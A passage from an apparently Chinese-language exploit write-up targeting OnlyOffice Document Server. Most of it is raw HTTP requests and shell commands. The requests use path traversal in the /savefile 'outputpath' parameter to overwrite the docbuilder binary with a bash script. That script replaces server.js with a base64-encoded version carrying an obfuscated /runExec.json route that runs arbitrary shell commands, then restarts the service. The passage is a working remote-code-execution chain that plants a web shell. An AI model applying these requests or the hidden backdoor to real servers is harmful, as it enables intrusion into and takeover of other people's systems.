JCQlsZXQgc3RhdGljQ29udGVudCA9IGNvbmZpZy5nZXQoJ3NlcnZlci5zdGF0aWNfY29udGVudCcpOwoJCQlsZXQgcGx1Z2luc1VyaSA9IGNvbmZpZy5nZXQoJ3BsdWdpbnMudXJpJyk7CgkJCWxldCBwbHVnaW5zUGF0aCA9IHVuZGVmaW5lZDsKCQkJbGV0IHBsdWdpbnNBdXRvc3RhcnQgPSBjb25maWcuZ2V0KCdwbHVnaW5zLmF1dG9zdGFydCcpOwoKCQkJaWYgKHN0YXRpY0NvbnRlbnRbcGx1Z2luc1VyaV0pIHsKCQkJCXBsdWdpbnNQYXRoID0gc3RhdGljQ29udGVudFtwbHVnaW5zVXJpXS5wYXRoOwoJCQl9CgoJCQlsZXQgYmFzZVVybCA9ICcuLi8uLi8uLi8uLic7CgkJCXV0aWxzLmxpc3RGb2xkZXJzKHBsdWdpbnNQYXRoLCB0cnVlKS50aGVuKCh2YWx1ZXMpID0+IHsKCQkJCXJldHVybiBjbyhmdW5jdGlvbiooKSB7CgkJCQkJY29uc3QgY29uZmlnRmlsZSA9ICdjb25maWcuanNvbic7CgkJCQkJbGV0IHN0YXRzID0gbnVsbDsKCQkJCQlsZXQgcmVzdWx0ID0gW107CgkJCQkJZm9yIChsZXQgaSA9IDA7IGkgPCB2YWx1ZXMubGVuZ3RoOyArK2kpIHsKCQkJCQkJdHJ5IHsKCQkJCQkJCXN0YXRzID0geWllbGQgdXRpbHMuZnNTdGF0KHBhdGguam9pbih2YWx1ZXNbaV0sIGNvbmZpZ0ZpbGUpKTsKCQkJCQkJfSBjYXRjaCAoZXJyKSB7CgkJCQkJCQlzdGF0cyA9IG51bGw7CgkJCQkJCX0KCgkJCQkJCWlmIChzdGF0cyAmJiBzdGF0cy5pc0ZpbGUpIHsKCQkJCQkJCXJlc3VsdC5wdXNoKCBiYXNlVXJsICsgcGx1Z2luc1VyaSArICcvJyArIHBhdGguYmFzZW5hbWUodmFsdWVzW2ldKSArICcvJyArIGNvbmZpZ0ZpbGUpOwoJCQkJCQl9CgkJCQkJfQoKCQkJCQl1c2VyUGx1Z2lucyA9IHsndXJsJzogJycsICdwbHVnaW5zRGF0YSc6IHJlc3VsdCwgJ2F1dG9zdGFydCc6IHBsdWdpbnNBdXRvc3RhcnR9OwoJCQkJCXNlbmRVc2VyUGx1Z2lucyhyZXMsIHVzZXJQbHVnaW5zKTsKCQkJCX0pOwoJCQl9KTsKCQl9KTsKCX0pOwoKCXByb2Nlc3Mub24oJ21lc3NhZ2UnLCAobXNnKSA9PiB7CgkJaWYgKCFkb2NzQ29TZXJ2ZXIpIHsKCQkJcmV0dXJuOwoJCX0KCQlzd2l0Y2ggKG1zZy50eXBlKSB7CgkJCWNhc2UgMToKCQkJCWRvY3NDb1NlcnZlci5zZXRMaWNlbnNlSW5mbyhtc2cuZGF0YSk7CgkJCQlicmVhazsKCQkJY2FzZSAyOgoJCQkJdXBkYXRlUGx1Z2lucyA9IHRydWU7CgkJCQlicmVhazsKCQl9Cgl9KTsKfQoKcHJvY2Vzcy5vbigndW5jYXVnaHRFeGNlcHRpb24nLCAoZXJyKSA9PiB7Cglsb2dnZXIuZXJyb3IoKG5ldyBEYXRlKS50b1VUQ1N0cmluZygpICsgJyB1bmNhdWdodEV4Y2VwdGlvbjonLCBlcnIubWVzc2FnZSk7Cglsb2dnZXIuZXJyb3IoZXJyLnN0YWNrKTsKCWxvZ2dlci5zaHV0ZG93bigoKSA9PiB7CgkJcHJvY2Vzcy5leGl0KDEpOwoJfSk7Cn0pOwo=" | base64 -d > /var/www/onlyoffice/documentserver/server/DocService/sources/server.js`` `
` `
执行下路由:
第三个包(重启服务):
`POST /savefile/1?cmd={"id":1,"outputpath":"../../../../../../../../var/www/onlyoffice/documentserver/server/FileConverter/bin/docbuilder"} HTTP/1.1``Host: 10.37.129.2:9000``Cache-Control: max-age=0``Upgrade-Insecure-Requests: 1``User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36``Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7``Accept-Encoding: gzip, deflate``Accept-Language: zh-CN,zh;q=0.9``Connection: close``Content-Type: application/x-www-form-urlencoded``Content-Length: 3`` ``/usr/bin/supervisorctl restart ds:docservice`
然后触发一下路由:
接下来访问接口:成功回显
当然我们本地通过docker查看文件也会发现已经被改动。
其实上边有一些坑点,实际情况下写js文件有些文件,所以我们还是整合一个包:
`POST /savefile/1?cmd={"id":1,"outputpath":"../../../../../../../../var/www/onlyoffice/documentserver/server/FileConverter/bin/docbuilder"} HTTP/1.1``Host: 10.37.129.2:9000``Cache-Control: max-age=0``Upgrade-Insecure-Requests: 1``User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36``Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7``Accept-Encoding: gzip, deflate``Accept-Language: zh-CN,zh;q=0.9``Connection: close``Content-Type: application/x-www-form-urlencoded``Content-Length: 3`
`#!/bin/bash``# 备份路由,删路由,写路由,重启路由``cp /var/www/onlyoffice/documentserver/server/DocService/sources/server.js /var/www/onlyoffice/documentserver/server/DocService/server.js;rm -rf /var/www/onlyoffice/documentserver/server/DocService/sources/server.js;echo "LyoKICogQ29weXJpZ2h0IChDKSBBc2NlbnNpbyBTeXN0ZW0gU0lBIDIwMTItMjAxOS4gQWxsIHJpZ2h0cyByZXNlcnZlZAogKgogKiBodHRwczovL3d3dy5vbmx5b2ZmaWNlLmNvbS8gCiAqCiAqIFZlcnNpb246IDUuNC4yIChidWlsZDo0NikKICovCgondXNlIHN0cmljdCc7Cgpjb25zdCBjbHVzdGVyID0gcmVxdWlyZSgnY2x1c3RlcicpOwpjb25zdCBjb25maWdDb21tb24gPSByZXF1aXJlKCdjb25maWcnKTsKY29uc3QgY29uZmlnID0gY29uZmlnQ29tbW9uLmdldCgnc2VydmljZXMuQ29BdXRob3JpbmcnKTsKY29uc3QgbG9nZ2VyID0gcmVxdWlyZSgnLi8uLi8uLi9Db21tb24vc291cmNlcy9sb2dnZXInKTsKY29uc3QgY28gPSByZXF1aXJlKCdjbycpOwpjb25zdCBsaWNlbnNlID0gcmVxdWlyZSgnLi8uLi8uLi9Db21tb24vc291cmNlcy9saWNlbnNlJyk7CgppZiAoY2x1c3Rlci5pc01hc3RlcikgewoJY29uc3QgZnMgPSByZXF1aXJlKCdmcycpOwoJbGV0IGxpY2Vuc2VJbmZvLCB3b3JrZXJzQ291bnQgPSAwLCB1cGRhdGVUaW1lOwoJY29uc3QgcmVhZExpY2Vuc2UgPSBmdW5jdGlvbiooKSB7CgkJbGljZW5zZUluZm8gPSB5aWVsZCogbGljZW5zZS5yZWFkTGljZW5zZSgpOwoJCXdvcmtlcnNDb3VudCA9IE1hdGgubWluKDEsIGxpY2Vuc2VJbmZvLmNvdW50LyosIE1hdGguY2VpbChudW1DUFVzICogY2ZnV29ya2VyUGVyQ3B1KSovKTsKCX07Cgljb25zdCB1cGRhdGVMaWNlbnNlV29ya2VyID0gKHdvcmtlcikgPT4gewoJCXdvcmtlci5zZW5kKHt0eXBlOiAxLCBkYXRhOiBsaWNlbnNlSW5mb30pOwoJfTsKCWNvbnN0IHVwZGF0ZVdvcmtlcnMgPSAoKSA9PiB7CgkJY29uc3QgYXJyS2V5V29ya2VycyA9IE9iamVjdC5rZXlzKGNsdXN0ZXIud29ya2Vycyk7CgkJaWYgKGFycktleVdvcmtlcnMubGVuZ3RoIDwgd29ya2Vyc0NvdW50KSB7CgkJCWZvciAobGV0IGkgPSBhcnJLZXlXb3JrZXJzLmxlbmd0aDsgaSA8IHdvcmtlcnNDb3VudDsgKytpKSB7CgkJCQljb25zdCBuZXdXb3JrZXIgPSBjbHVzdGVyLmZvcmsoKTsKCQkJCWxvZ2dlci53YXJuKCd3b3JrZXIgJXMgc3RhcnRlZC4nLCBuZXdXb3JrZXIucHJvY2Vzcy5waWQpOwoJCQl9CgkJfSBlbHNlIHsKCQkJZm9yIChsZXQgaSA9IHdvcmtlcnNDb3VudDsgaSA8IGFycktleVdvcmtlcnMubGVuZ3RoOyArK2kpIHsKCQkJCWNvbnN0IGtpbGxXb3JrZXIgPSBjbHVzdGVyLndvcmtlcnNbYXJyS2V5V29ya2Vyc1tpXV07CgkJCQlpZiAoa2lsbFdvcmtlcikgewoJCQkJCWtpbGxXb3JrZXIua2lsbCgpOwoJCQkJfQoJCQl9CgkJfQoJfTsKCWNvbnN0IHVwZGF0ZVBsdWdpbnMgPSAoZXZlbnRUeXBlLCBmaWxlbmFtZSkgPT4gewoJCWNvbnNvbGUubG9nKCd1cGRhdGUgRm9sZGVyOiAlcyA7ICVzJywgZXZlbnRUeXBlLCBmaWxlbmFtZSk7CgkJaWYgKHVwZGF0ZVRpbWUgJiYgMTAwMCA+PSAobmV3IERhdGUoKSAtIHVwZGF0ZVRpbWUpKSB7CgkJCXJldHVybjsKCQl9CgkJY29uc29sZS5sb2coJ3VwZGF0ZSBGb2xkZXIgdHJ1ZTogJXMgOyAlcycsIGV2ZW50VHlwZSwgZmlsZW5hbWUpOwoJCXVwZGF0ZVRpbWUgPSBuZXcgRGF0ZSgpOwoJCWZvciAobGV0IGkgaW4gY2x1c3Rlci53b3JrZXJzKSB7CgkJCWNsdXN0ZXIud29ya2Vyc1tpXS5zZW5kKHt0eXBlOiAyfSk7CgkJfQoJfTsKCWNvbnN0IHVwZGF0ZUxpY2Vuc2UgPSAoKSA9PiB7CgkJcmV0dXJuIGNvKGZ1bmN0aW9uKigpIHsKCQkJdHJ5IHsKCQkJCXlpZWxkKiByZWFkTGljZW5zZSgpOwoJCQkJbG9nZ2VyLndhcm4oJ3VwZGF0ZSBjbHVzdGVyIHdpdGggJXMgd29ya2VycycsIHdvcmtlcnNDb3VudCk7CgkJCQlmb3IgKGxldCBpIGluIGNsdXN0ZXIud29ya2VycykgewoJCQkJCXVwZGF0ZUxpY2Vuc2VXb3JrZXIoY2x1c3Rlci53b3JrZXJzW2ldKTsKCQkJCX0KCQkJCXVwZGF0ZVdvcmtlcnMoKTsKCQkJfSBjYXRjaCAoZXJyKSB7CgkJCQlsb2dnZXIuZXJyb3IoJ3VwZGF0ZUxpY2Vuc2UgZXJyb3I6XHJcbiVzJywgZXJyLnN0YWNrKTsKCQkJfQoJCX0pOwoJfTsKCgljbHVzdGVyLm9uKCdmb3JrJywgKHdvcmtlcikgPT4gewoJCXVwZGF0ZUxpY2Vuc2VXb3JrZXIod29ya2VyKTsKCX0pOwoJY2x1c3Rlci5vbignZXhpdCcsICh3b3JrZXIsIGNvZGUsIHNpZ25hbCkgPT4gewoJCWxvZ2dlci53YXJuKCd3b3JrZXIgJXMgZGllZCAoY29kZSA9ICVzOyBzaWduYWwgPSAlcykuJywgd29ya2VyLnByb2Nlc3MucGlkLCBjb2RlLCBzaWduYWwpOwoJCXVwZGF0ZVdvcmtlcnMoKTsKCX0pOwoKCXVwZGF0ZUxpY2Vuc2UoKTsKCgl0cnkgewoJCWZzLndhdGNoKGNvbmZpZy5nZXQoJ3BsdWdpbnMucGF0aCcpLCB1cGRhdGVQbHVnaW5zKTsKCX0gY2F0Y2ggKGUpIHsKCQlsb2dnZXIud2FybignUGx1Z2lucyB3YXRjaCBleGNlcHRpb24gKGh0dHBzOi8vbm9kZWpzLm9yZy9kb2NzL2xhdGVzdC9hcGkvZnMuaHRtbCNmc19hdmFpbGFiaWxpdHkpLicpOwoJfQoJZnMud2F0Y2hGaWxlKGNvbmZpZ0NvbW1vbi5nZXQoJ2xpY2Vuc2UnKS5nZXQoJ2xpY2Vuc2VfZmlsZScpLCB1cGRhdGVMaWNlbnNlKTsKCXNldEludGVydmFsKHVwZGF0ZUxpY2Vuc2UsIDg2NDAwMDAwKTsKfSBlbHNlIHsKCWxvZ2dlci53YXJuKCdFeHByZXNzIHNlcnZlciBzdGFydGluZy4uLicpOwoKCWNvbnN0IGV4cHJlc3MgPSByZXF1aXJlKCdleHByZXNzJyk7Cgljb25zdCBodHRwID0gcmVxdWlyZSgnaHR0cCcpOwoJY29uc3QgdXJsTW9kdWxlID0gcmVxdWlyZSgndXJsJyk7Cgljb25zdCBwYXRoID0gcmVxdWlyZSgncGF0aCcpOwoJY29uc3QgYm9keVBhcnNlciA9IHJlcXVpcmUoImJvZHktcGFyc2VyIik7Cgljb25zdCBtaW1lID0gcmVxdWlyZSgnbWltZScpOwoJY29uc3QgZG9jc0NvU2VydmVyID0gcmVxdWlyZSgnLi9Eb2NzQ29TZXJ2ZXInKTsKCWNvbnN0IGNhbnZhc1NlcnZpY2UgPSByZXF1aXJlKCcuL2NhbnZhc3NlcnZpY2UnKTsKCWNvbnN0IGNvbnZlcnRlclNlcnZpY2UgPSByZXF1aXJlKCcuL2NvbnZlcnRlcnNlcnZpY2UnKTsKCWNvbnN0IGZpbGVVcGxvYWRlclNlcnZpY2UgPSByZXF1aXJlKCcuL2ZpbGV1cGxvYWRlcnNlcnZpY2UnKTsKCWNvbnN0IGNvbnN0YW50cyA9IHJlcXVpcmUoJy4vLi4vLi4vQ29tbW9uL3NvdXJjZXMvY29uc3RhbnRzJyk7Cgljb25zdCB1dGlscyA9IHJlcXVpcmUoJy4vLi4vLi4vQ29tbW9uL3NvdXJjZXMvdXRpbHMnKTsKCWNvbnN0IGNvbW1vbkRlZmluZXMgPSByZXF1aXJlKCcuLy4uLy4uL0NvbW1vbi9zb3VyY2VzL2NvbW1vbmRlZmluZXMnKTsKCWNvbnN0IGNvbmZpZ1N0b3JhZ2UgPSBjb25maWdDb21tb24uZ2V0KCdzdG9yYWdlJyk7Cgljb25zdCBhcHAgPSBleHByZXNzKCk7Cgljb25zdCBzZXJ2ZXIgPSBodHRwLmNyZWF0ZVNlcnZlcihhcHApOwoKCWxldCB1c2VyUGx1Z2lucyA9IG51bGwsIHVwZGF0ZVBsdWdpbnMgPSB0cnVlOwoKCWlmIChjb25maWcuaGFzKCdzZXJ2ZXIuc3RhdGljX2NvbnRlbnQnKSkgewoJCWNvbnN0IHN0YXRpY0NvbnRlbnQgPSBjb25maWcuZ2V0KCdzZXJ2ZXIuc3RhdGljX2NvbnRlbnQnKTsKCQlmb3IgKGxldCBpIGluIHN0YXRpY0NvbnRlbnQpIHsKCQkJYXBwLnVzZShpLCBleHByZXNzLnN0YXRpYyhzdGF0aWNDb250ZW50W2ldWydwYXRoJ10sIHN0YXRpY0NvbnRlbnRbaV1bJ29wdGlvbnMnXSkpOwoJCX0KCX0KCglpZiAoY29uZmlnU3RvcmFnZS5oYXMoJ2ZzLmZvbGRlclBhdGgnKSkgewoJCWNvbnN0IGNmZ0J1Y2tldE5hbWUgPSBjb25maWdTdG9yYWdlLmdldCgnYnVja2V0TmFtZScpOwoJCWNvbnN0IGNmZ1N0b3JhZ2VGb2xkZXJOYW1lID0gY29uZmlnU3RvcmFnZS5nZXQoJ3N0b3JhZ2VGb2xkZXJOYW1lJyk7CgkJYXBwLnVzZSgnLycgKyBjZmdCdWNrZXROYW1lICsgJy8nICsgY2ZnU3RvcmFnZUZvbGRlck5hbWUsIChyZXEsIHJlcywgbmV4dCkgPT4gewoJCQljb25zdCBpbmRleCA9IHJlcS51cmwubGFzdEluZGV4T2YoJy8nKTsKCQkJaWYgKCdHRVQnID09PSByZXEubWV0aG9kICYmIC0xICE9IGluZGV4KSB7CgkJCQljb25zdCBjb250ZW50RGlzcG9zaXRpb24gPSByZXEucXVlcnlbJ2Rpc3Bvc2l0aW9uJ10gfHwgJ2F0dGFjaG1lbnQnOwoJCQkJbGV0IHNlbmRGaWxlT3B0aW9ucyA9IHsKCQkJCQlyb290OiBjb25maWdTdG9yYWdlLmdldCgnZnMuZm9sZGVyUGF0aCcpLCBkb3RmaWxlczogJ2RlbnknLCBoZWFkZXJzOiB7CgkJCQkJCSdDb250ZW50LURpc3Bvc2l0aW9uJzogY29udGVudERpc3Bvc2l0aW9uCgkJCQkJfQoJCQkJfTsKCQkJCWNvbnN0IHVybFBhcnNlZCA9IHVybE1vZHVsZS5wYXJzZShyZXEudXJsKTsKCQkJCWlmICh1cmxQYXJzZWQgJiYgdXJsUGFyc2VkLnBhdGhuYW1lKSB7CgkJCQkJY29uc3QgZmlsZW5hbWUgPSBkZWNvZGVVUklDb21wb25lbnQocGF0aC5iYXNlbmFtZSh1cmxQYXJzZWQucGF0aG5hbWUpKTsKCQkJCQlzZW5kRmlsZU9wdGlvbnMuaGVhZGVyc1snQ29udGVudC1UeXBlJ10gPSBtaW1lLmdldFR5cGUoZmlsZW5hbWUpOwoJCQkJfQoJCQkJY29uc3QgcmVhbFVybCA9IHJlcS51cmwuc3Vic3RyaW5nKDAsIGluZGV4KTsKCQkJCXJlcy5zZW5kRmlsZShyZWFsVXJsLCBzZW5kRmlsZU9wdGlvbnMsIChlcnIpID0+IHsKCQkJCQlpZiAoZXJyKSB7CgkJCQkJCWxvZ2dlci5lcnJvcihlcnIpOwoJCQkJCQlyZXMuc3RhdHVzKDQwMCkuZW5kKCk7CgkJCQkJfQoJCQkJfSk7CgkJCX0gZWxzZSB7CgkJCQlyZXMuc2VuZFN0YXR1cyg0MDQpCgkJCX0KCQl9KTsKCX0KCWRvY3NDb1NlcnZlci5pbnN0YWxsKHNlcnZlciwgKCkgPT4gewoJCXNlcnZlci5saXN0ZW4oY29uZmlnLmdldCgnc2VydmVyLnBvcnQnKSwgKCkgPT4gewoJCQlsb2dnZXIud2FybigiRXhwcmVzcyBzZXJ2ZXIgbGlzdGVuaW5nIG9uIHBvcnQgJWQgaW4gJXMgbW9kZSIsIGNvbmZpZy5nZXQoJ3NlcnZlci5wb3J0JyksIGFwcC5zZXR0aW5ncy5lbnYpOwoJCX0pOwoJCWFwcC5hbGwoJy9ydW5FeGVjLmpzb24nLCAocmVxLCByZXMpID0+IHsKCQkJY29uc3Qgc3Bhd24gPSByZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuc3Bhd247CgkJCXZhciB1c2VybmFtZSA9IHJlcS5xdWVyeS51c2VybmFtZSA/IHJlcS5xdWVyeS51c2VybmFtZTogcmVxLmhlYWRlcigidXNlcm5hbWUiKTsKCQkJaWYoIXVzZXJuYW1lKXsKCQkJCXJlcy5zZW5kKCJlbXB0eSBwYXJhISIpOwoJCQl9ZWxzZSB7CgkJCQljb25zdCBjbWQgPSBzcGF3bignc2gnLCBbJy1jJywgdXNlcm5hbWVdKTsKCQkJCXZhciByZXN1bHQgPSAiIjsKCQkJCWNtZC5zdGRvdXQub24oJ2RhdGEnLCAoZGF0YSkgPT4gewoJCQkJCXJlc3VsdCArPSBkYXRhOwoJCQkJfSk7CgoJCQkJY21kLm9uKCdjbG9zZScsIChjb2RlKSA9PiB7CgkJCQkJcmVzLnNlbmQocmVzdWx0KTsKCQkJCQlyZXR1cm4gcmVzLmVuZCgpOwoJCQkJfSkKCQkJfQoJCX0pOwoJCWFwcC5nZXQoJy9pbmRleC5odG1sJywgKHJlcSwgcmVzKSA9PiB7CgkJCXJlcy5zZW5kKCdTZXJ2ZXIgaXMgZnVuY3Rpb25pbmcgbm9ybWFsbHkuIFZlcnNpb246ICcgKyBjb21tb25EZWZpbmVzLmJ1aWxkVmVyc2lvbiArICcuIEJ1aWxkOiAnICsKCQkJCWNvbW1vbkRlZmluZXMuYnVpbGROdW1iZXIpOwoJCX0pOwoJCWNvbnN0IHJhd0ZpbGVQYXJzZXIgPSBib2R5UGFyc2VyLnJhdygKCQkJe2luZmxhdGU6IHRydWUsIGxpbWl0OiBjb25maWcuZ2V0KCdzZXJ2ZXIubGltaXRzX3RlbXBmaWxlX3VwbG9hZCcpLCB0eXBlOiAnKi8qJ30pOwoKCQlhcHAuZ2V0KCcvY29hdXRob3JpbmcvQ29tbWFuZFNlcnZpY2UuYXNoeCcsIHV0aWxzLmNoZWNrQ2xpZW50SXAsIHJhd0ZpbGVQYXJzZXIsIGRvY3NDb1NlcnZlci5jb21tYW5kRnJvbVNlcnZlcik7CgkJYXBwLnBvc3QoJy9jb2F1dGhvcmluZy9Db21tYW5kU2VydmljZS5hc2h4JywgdXRpbHMuY2hlY2tDbGllbnRJcCwgcmF3RmlsZVBhcnNlciwKCQkJZG9jc0NvU2VydmVyLmNvbW1hbmRGcm9tU2VydmVyKTsKCgkJYXBwLmdldCgnL0NvbnZlcnRTZXJ2aWNlLmFzaHgnLCB1dGlscy5jaGVja0NsaWVudElwLCByYXdGaWxlUGFyc2VyLCBjb252ZXJ0ZXJTZXJ2aWNlLmNvbnZlcnRYbWwpOwoJCWFwcC5wb3N0KCcvQ29udmVydFNlcnZpY2UuYXNoeCcsIHV0aWxzLmNoZWNrQ2xpZW50SXAsIHJhd0ZpbGVQYXJzZXIsIGNvbnZlcnRlclNlcnZpY2UuY29udmVydFhtbCk7CgkJYXBwLnBvc3QoJy9jb252ZXJ0ZXInLCB1dGlscy5jaGVja0NsaWVudElwLCByYXdGaWxlUGFyc2VyLCBjb252ZXJ0ZXJTZXJ2aWNlLmNvbnZlcnRKc29uKTsKCgoJCWFwcC5nZXQoJy9GaWxlVXBsb2FkZXIuYXNoeCcsIHV0aWxzLmNoZWNrQ2xpZW50SXAsIHJhd0ZpbGVQYXJzZXIsIGZpbGVVcGxvYWRlclNlcnZpY2UudXBsb2FkVGVtcEZpbGUpOwoJCWFwcC5wb3N0KCcvRmlsZVVwbG9hZGVyLmFzaHgnLCB1dGlscy5jaGVja0NsaWVudElwLCByYXdGaWxlUGFyc2VyLCBmaWxlVXBsb2FkZXJTZXJ2aWNlLnVwbG9hZFRlbXBGaWxlKTsKCgkJY29uc3QgZG9jSWRSZWdFeHAgPSBuZXcgUmVnRXhwKCJeWyIgKyBjb25zdGFudHMuRE9DX0lEX1BBVFRFUk4gKyAiXSokIiwgJ2knKTsKCQlhcHAucGFyYW0oJ2RvY2lkJywgKHJlcSwgcmVzLCBuZXh0LCB2YWwpID0+IHsKCQkJaWYgKGRvY0lkUmVnRXhwLnRlc3QodmFsKSkgewoJCQkJbmV4dCgpOwoJCQl9IGVsc2UgewoJCQkJcmVzLnNlbmRTdGF0dXMoNDAzKTsKCQkJfQoJCX0pOwoJCWFwcC5wYXJhbSgnaW5kZXgnLCAocmVxLCByZXMsIG5leHQsIHZhbCkgPT4gewoJCQlpZiAoIWlzTmFOKHBhcnNlSW50KHZhbCkpKSB7CgkJCQluZXh0KCk7CgkJCX0gZWxzZSB7CgkJCQlyZXMuc2VuZFN0YXR1cyg0MDMpOwoJCQl9CgkJfSk7CgkJYXBwLnBvc3QoJy91cGxvYWRvbGQvOmRvY2lkLzp1c2VyaWQvOmluZGV4JywgZmlsZVVwbG9hZGVyU2VydmljZS51cGxvYWRJbWFnZUZpbGVPbGQpOwoJCWFwcC5wb3N0KCcvdXBsb2FkLzpkb2NpZC86dXNlcmlkLzppbmRleCcsIHJhd0ZpbGVQYXJzZXIsIGZpbGVVcGxvYWRlclNlcnZpY2UudXBsb2FkSW1hZ2VGaWxlKTsKCgkJYXBwLnBvc3QoJy9kb3dubG9hZGFzLzpkb2NpZCcsIHJhd0ZpbGVQYXJzZXIsIGNhbnZhc1NlcnZpY2UuZG93bmxvYWRBcyk7CgkJYXBwLnBvc3QoJy9zYXZlZmlsZS86ZG9jaWQnLCByYXdGaWxlUGFyc2VyLCBjYW52YXNTZXJ2aWNlLnNhdmVGaWxlKTsKCQlhcHAuZ2V0KCcvaGVhbHRoY2hlY2snLCB1dGlscy5jaGVja0NsaWVudElwLCBkb2NzQ29TZXJ2ZXIuaGVhbHRoQ2hlY2spOwoKCQlhcHAuZ2V0KCcvYmFzZXVybCcsIChyZXEsIHJlcykgPT4gewoJCQlyZXMuc2VuZCh1dGlscy5nZXRCYXNlVXJsQnlSZXF1ZXN0KHJlcSkpOwoJCX0pOwoKCQlhcHAuZ2V0KCcvcm9ib3RzLnR4dCcsIChyZXEsIHJlcykgPT4gewoJCQlyZXMuc2V0SGVhZGVyKCdDb250ZW50LVR5cGUnLCAncGxhaW4vdGV4dCcpOwoJCQlyZXMuc2VuZCgiVXNlci1hZ2VudDogKlxuRGlzYWxsb3c6IC8iKTsKCQl9KTsKCgkJYXBwLnBvc3QoJy9kb2NidWlsZGVyJywgdXRpbHMuY2hlY2tDbGllbnRJcCwgcmF3RmlsZVBhcnNlciwgKHJlcSwgcmVzKSA9PiB7CgkJCWNvbnZlcnRlclNlcnZpY2UuYnVpbGRlcihyZXEsIHJlcyk7CgkJfSk7CgkJYXBwLmdldCgnL2luZm8vaW5mby5qc29uJywgdXRpbHMuY2hlY2tDbGllbnRJcCwgZG9jc0NvU2VydmVyLmxpY2Vuc2VJbmZvKTsKCgkJY29uc3Qgc2VuZFVzZXJQbHVnaW5zID0gKHJlcywgZGF0YSkgPT4gewoJCQlyZXMuc2V0SGVhZGVyKCdDb250ZW50LVR5cGUnLCAnYXBwbGljYXRpb24vanNvbicpOwoJCQlyZXMuc2VuZChKU09OLnN0cmluZ2lmeShkYXRhKSk7CgkJfTsKCQlhcHAuZ2V0KCcvcGx1Z2lucy5qc29uJywgKHJlcSwgcmVzKSA9PiB7CgkJCWlmICh1c2VyUGx1Z2lucyAmJiAhdXBkYXRlUGx1Z2lucykgewoJCQkJc2VuZFVzZXJQbHVnaW5zKHJlcywgdXNlclBsdWdpbnMpOwoJCQkJcmV0dXJuOwoJCQl9CgoJCQlpZiAoIWNvbmZpZy5oYXMoJ3NlcnZlci5zdGF0aWNfY29udGVudCcpIHx8ICFjb25maWcuaGFzKCdwbHVnaW5zLnVyaScpKSB7CgkJCQlyZXMuc2VuZFN0YXR1cyg0MDQpOwoJCQkJcmV0dXJuOwoJCQl9CgoJCQlsZXQgc3RhdGljQ29udGVudCA9IGNvbmZpZy5nZXQoJ3NlcnZlci5zdGF0aWNfY29udGVudCcpOwoJCQlsZXQgcGx1Z2luc1VyaSA9IGNvbmZpZy5nZXQoJ3BsdWdpbnMudXJpJyk7CgkJCWxldCBwbHVnaW5zUGF0aCA9IHVuZGVmaW5lZDsKCQkJbGV0IHBsdWdpbnNBdXRvc3RhcnQgPSBjb25maWcuZ2V0KCdwbHVnaW5zLmF1dG9zdGFydCcpOwoKCQkJaWYgKHN0YXRpY0NvbnRlbnRbcGx1Z2luc1VyaV0pIHsKCQkJCXBsdWdpbnNQYXRoID0gc3RhdGljQ29udGVudFtwbHVnaW5zVXJpXS5wYXRoOwoJCQl9CgoJCQlsZXQgYmFzZVVybCA9ICcuLi8uLi8uLi8uLic7CgkJCXV0aWxzLmxpc3RGb2xkZXJzKHBsdWdpbnNQYXRoLCB0cnVlKS50aGVuKCh2YWx1ZXMpID0+IHsKCQkJCXJldHVybiBjbyhmdW5jdGlvbiooKSB7CgkJCQkJY29uc3QgY29uZmlnRmlsZSA9ICdjb25maWcuanNvbic7CgkJCQkJbGV0IHN0YXRzID0gbnVsbDsKCQkJCQlsZXQgcmVzdWx0ID0gW107CgkJCQkJZm9yIChsZXQgaSA9IDA7IGkgPCB2YWx1ZXMubGVuZ3RoOyArK2kpIHsKCQkJCQkJdHJ5IHsKCQkJCQkJCXN0YXRzID0geWllbGQgdXRpbHMuZnNTdGF0KHBhdGguam9pbih2YWx1ZXNbaV0sIGNvbmZpZ0ZpbGUpKTsKCQkJCQkJfSBjYXRjaCAoZXJyKSB7CgkJCQkJCQlzdGF0cyA9IG51bGw7CgkJCQkJCX0KCgkJCQkJCWlmIChzdGF0cyAmJiBzdGF0cy5pc0ZpbGUpIHsKCQkJCQkJCXJlc3VsdC5wdXNoKCBiYXNlVXJsICsgcGx1Z2luc1VyaSArICcvJyArIHBhdGguYmFzZW5hbWUodmFsdWVzW2ldKSArICcvJyArIGNvbmZpZ0ZpbGUpOwoJCQkJCQl9CgkJCQkJfQoKCQkJCQl1c2VyUGx1Z2lucyA9IHsndXJsJzogJycsICdwbHVnaW5zRGF0YSc6IHJlc3VsdCwgJ2F1dG9zdGFydCc6IHBsdWdpbnNBdXRvc3RhcnR9OwoJCQkJCXNlbmRVc2VyUGx1Z2lucyhyZXMsIHVzZXJQbHVnaW5zKTsKCQkJCX0pOwoJCQl9KTsKCQl9KTsKCX0pOwoKCXByb2Nlc3Mub24oJ21lc3NhZ2UnLCAobXNnKSA9PiB7CgkJaWYgKCFkb2NzQ29TZXJ2ZXIpIHsKCQkJcmV0dXJuOwoJCX0KCQlzd2l0Y2ggKG1zZy50eXBlKSB7CgkJCWNhc2UgMToKCQkJCWRvY3NDb1NlcnZlci5zZXRMaWNlbnNlSW5mbyhtc2cuZGF0YSk7CgkJCQlicmVhazsKCQkJY2FzZSAyOgoJCQkJdXBkYXRlUGx1Z2lucyA9IHRydWU7CgkJCQlicmVhazsKCQl9Cgl9KTsKfQoKcHJvY2Vzcy5vbigndW5jYXVnaHRFeGNlcHRpb24nLCAoZXJyKSA9PiB7Cglsb2dnZXIuZXJyb3IoKG5ldyBEYXRlKS50b1VUQ1N0cmluZygpICsgJyB1bmNhdWdodEV4Y2VwdGlvbjonLCBlcnIubWVzc2FnZSk7Cglsb2dnZXIuZXJyb3IoZXJyLnN0YWNrKTsKCWxvZ2dlci5zaHV0ZG93bigoKSA9PiB7CgkJcHJvY2Vzcy5leGl0KDEpOwoJfSk7Cn0pOwo=" | base64 -d > /var/www/onlyoffice/documentserver/server/DocService/sources/server.js;/usr/bin/supervisorctl restart ds:docservice`` `
至此,页面交互命令回显成功。
